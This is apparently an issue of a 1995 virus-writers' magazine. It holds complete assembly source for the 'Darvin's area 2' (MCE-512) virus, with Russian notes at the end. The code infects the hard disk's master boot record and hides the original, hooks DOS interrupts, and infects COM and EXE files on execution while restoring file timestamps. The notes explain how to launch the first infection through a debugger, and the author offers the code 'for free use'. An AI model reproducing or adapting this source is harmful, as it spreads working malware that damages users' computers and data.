           ▄▄                  █
          ▀▀▀ Monthly Magazine █ For VirMakers.                  JULY '95
          ▀██ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ █ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▐▀▀▀  █▀▀▀▀▀▀█
           ▐█ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▄█▄ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ █▄▄   █ ▐▀▀█ █
            █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █   █     █   ▐▌ █
            █ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄▄  █   █  █
            ▐ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  █▄▄▄▄▄▄█
           (C) STEALTH group WWide, Box 10, Kiev-148, fUcKRAINE 
 ─────────────────────────────────────────────────────────────────────────────
;██████████████████████████████████████████████████████████████████████████
;██──────────────────────────────────────────────────────────────────────██
;██ "Darvin's area 2."						         ██
;██    Version:   2.00            MCE-512			         ██
;██	 (c) Light General					         ██
;██								         ██
;██████████████████████████████████████████████████████████████████████████
;Пояснения приведены в конце файла!!!

		.model tiny
		.code
  
		org	100h

;################### Virus ####################
start:
		cld
		jmp	COM_install
		xor	di,di
		mov	ds,di
		cli
		mov	ss,di
		mov	si,7c00h
		mov	bx,si	; bx = 7C00h
		mov	byte ptr [si+02],44h  ; For COM_inst
		mov	sp,si
		dec	word ptr ds:[0413h]
		int	12h	; AX = Total Memory (kb.)
;---------------------------------
		mov	cx,0206h
		shl	ax,cl
		mov	es,ax
		mov	ax,offset inst_int-100h
		push	es
		push	ax
        	rep	movsb	; cx=206h
		retf
;----------------------------------------------
inst_int:
		mov	di,offset int_1Ch_entry-100h
		mov	word ptr ds:[1Ch*4],di
		mov	al,90h	; NOP
		stosb
		mov	ds:[1Ch*4+2],es
;- Load origin MBR.-------------------
		push	cx
		push	bx
		mov	es,cx	; ES = 0000
		mov	cl,05	; CX = 0005
read_mbr	proc
		mov	ax,0201h
		mov	dx,0080h
		int	13h
		retf
read_mbr	endp
;----------------------------------------------
COM_install:
		call	$+3
COM_body:
		pop	bp
		sub	bp,(offset COM_body-100h)
		mov	ax,ds
		mov	bx,ds
		push    cs
		push    cs
		pop     ds
		pop     es
;-----------------------------------------------
		lea	si,ds:[bp+(offset origin_bytes-100h)]
		cmp	byte ptr [si],'M'
		jz	L_exe
		mov	di,100h
		push	cs
		push	di
		movsw
		movsw
                jmp     Look_MBR
;-Loaded from exe file.--------------------------------------------
L_exe:
		add	ax,10h
CS_file:	add	ax,0000
                push    ax
IP_file:	mov	ax,0000
		push	ax
;-----------------------------------------------
Look_MBR:
                push    bx
		lea	bx,ds:[bp+(offset MBR_buffer)+1000h]
		mov	cx,1
		push	cs
		call	read_mbr
		jc	Go_COM
;----------------------------------------------
		cmp	byte ptr [bx],0FCh	; CLD
		jz	Go_COM			; Already infected!
;----------------------------------------------
		mov	ax,0301h	; AX = 0301h
		mov	cl,05
		push	ax
		int	13h		; Hide old MBR!
		pop	ax
; Нет места ,чтобы проверять флаг ошибки....
;----------------------------------------------
		mov	byte ptr [bp+02],ch	; For MBR_inst
		lea	si,ds:[bx+1beh]
		lea	di,ds:[bp+(offset Partirion)-100h]
		mov	cl,21h
		rep	movsw	; Take infected partition!
		inc	cx
		mov	bx,bp
		int	13h	; Write virus to MBR!
Go_COM:
                pop     ds
                push    ds
                pop     es
                retf
;------------------------------------------------------------------
int_1Ch_entry:
timer		db	90h	; <- 90h (NOP) or 0CFh (IRET)
		push	ax ds es
		xor	ax,ax
		mov	ds,ax
		les	ax,dword ptr ds:[21h*4]
		cmp	ah,08   ; ax>0800h
		ja	exit_1C
;-----------------------------------------------------------
		mov	ds:[0E1h*4],ax
		mov	ds:[0E1h*4+2],es
		mov	word ptr cs:[offset ofs_21h-100h],ax
		mov	word ptr cs:[offset seg_21h-100h],es
;-----------------------------------------------------------
		mov	word ptr ds:[21h*4],offset int_21h_entry-100h
		mov	ds:[21h*4+2],cs
		mov	byte ptr cs:[offset timer-100h],0CFh	; IRET
exit_1C:
		pop	es ds ax
		iret
;----------------------------------------------
int_21h_entry:
		push	ax bx cx dx di si ds es bp
		cmp	ax,4b00h	; Execute file?
		je	Exec		; Yes!
exit_pop:
		pop	bp es ds si di dx cx bx ax
		db	0eah
ofs_21h		dw	0000
seg_21h		dw	0000
;-Откроем файл.---------------------------------
Exec:
		mov	ax,3524h
		int	0E1h
		mov	byte ptr es:[bx],0CFh	; Kill int_24h
		mov	ax,3d00h
		int	0E1h
		jc	exit_int
;- Read 18h first bytes!--------------
		mov	bh,3fh
		xchg	ax,bx
		mov	cx,18h
		mov	dx,offset origin_bytes-100h
		mov	si,dx
		push	cs
		pop	ds
		int	0E1h
;- Look SFT.-----------------------------------------
		mov	ax,1220h
		push	bx
		int	2fh
		mov	bl,es:[di]
		mov	ax,1216h
		int	2fh
		pop	bx
		mov	byte ptr es:[di+2],02	; Open mode = r/w
		mov	bp,es:[di+17]	; File len.
;- Compare MZ & M (.EXE file or infect label).------
		lodsb
		dec	si
		cmp	al,'M'
		jz	_EXE
;- Infect this file!------------------------------
		xchg	ax,bp
		cmp	ah,0f9h		; fa00h = 64000
		ja	exit_int
		mov	es:[di+21],ax	; F.p.= end file!
;- Make JMP.--------------------------------------
		sub	ax,04
		mov	word ptr ds:[offset start_jmp-100h],ax
;-------------------------------------------------
		call	write_virus	; Пишем вирус в файл!
;-------------------------------------------------
		mov	dx,offset new_bytes-100h
		mov	cx,04
exit_write:
		mov	ah,40h
		int	0E1h	; Write jmp in start file!
;-------------------------------------------------
exit_date:
		mov	ax,5701h
		mov	dx,es:[di+15]
		mov	cx,es:[di+13]
		int	0E1h	; Set old date/time!
exit_int:
		mov	ah,3eh	; Close file!
		int	0E1h
		jmp	exit_pop
;-Sub. for write virus body (only) in file.----
write_virus	proc
		xor	dx,dx
		mov	ah,40h
		mov	cx,offset end_virus-100h
		int	0E1h
		mov	es:[di+21],dx	; F.p.= start file!
		mov	es:[di+23],dx	;
		ret
write_virus	endp
;-Infect .EXE ---------------------------------
_EXE:
		mov	ax,ds:[si+4]		; Pages (512b).
		dec	ax
		mov	cx,512
		mul	cx
		add	ax,[si+2]	; AX = File len from header.
		cmp	ax,bp		; Real file len = ax ?
		jnz	exit_int	; No - this is overlay.
;-----
		mov	es:[di+21],ax	; F.p.= end file.
		mov	es:[di+23],dx
;-Get header.-----------------------------------
		mov	ax,[si+14h]
		mov	word ptr ds:[offset IP_file-100h][1],ax
		mov	ax,[si+16h]
		mov	word ptr ds:[offset CS_file-100h][1],ax
;-----------------------------------------------
		xchg	ax,bp
		mov	cx,10h
		div	cx
		sub	ax,[si+8]
		sbb	dx,0
		mov	[si+16h],ax	; ReloCS.
		mov	[si+14h],dx	; ExeIP.
;-Correcting file len in header.----------------
		inc	word ptr ds:[si+4]
;-Write virus in file.--------------------------
		call	write_virus
;-Write new header.-----------------------------
		mov	cx,18h
		mov	dx,si	; DX = offset header.
		jmp	exit_write
;-----------------------------------------------
new_bytes	db	'M'
		db	0e9h
start_jmp	dw	?
;-Partition Table for MBR.---------------------
		org	1beh+100h

Partirion	db	?
;----------------------------------------------
		org	1c0h+100h
origin_bytes	db	4 dup (?)
;----------------------------------------------
end_virus	db	?
;----------------------------------------------
		org	511+100h
		db	'+'
MBR_buffer	db	512 dup (?)
;----------------------------------------------
		end	start
;--Written by Light General.Kiev.1995.For free use!-------
;
; Собственно говоря данный вирус не является полной реализацией MCE вируса. 
;Его особенность в том,что в память он инсталлируется только из 
;зараженного MBR'а!
; Способ опознавания зараженных файлов весьма обычен - в начало .COM файла
;дописывается цепочка :
;	dec	bp	; 'M'
;	jmp	start	; 0e9h xxxx .
;Буква 'M' говорит вирусу о том,что это де файл типа .EXE ... , а часть вируса
;отвечающая за заражение таких файлов возьмет заведомо неверные данные
;из буфера для считывания .EXE'щного заголовка и решит , что это оверлейный
;файл!!!
;(Специально для господ ламеров скажу , что можно ужать вирус ЕЩЕ на пару байт
; если использовать подпрограмму Write_Virus при записи в начало файла .)
;
;Несколько слов об инсталляции :
;  Для того ,чтобы сию заразу не распускали где попало - я не предусмотрел
;запуска откомпилированного исходника из командной строки!!!
; (Говорю это сразу дабы избежать повторения обиженных всхлипов по поводу
;  зависания при ТАКОМ запуске моего "первенца" MC-512.)
; Чтобы в самый первый раз заразить машину надобно полученый посредством
;asm & link операций .COM файл загнать в отладчик и при трассировке
;обойти три команды movsb , а затем дать команду [G ip] после чего
;перегружаем машину и имеем радость наблюдать как работает мой MCE-512.
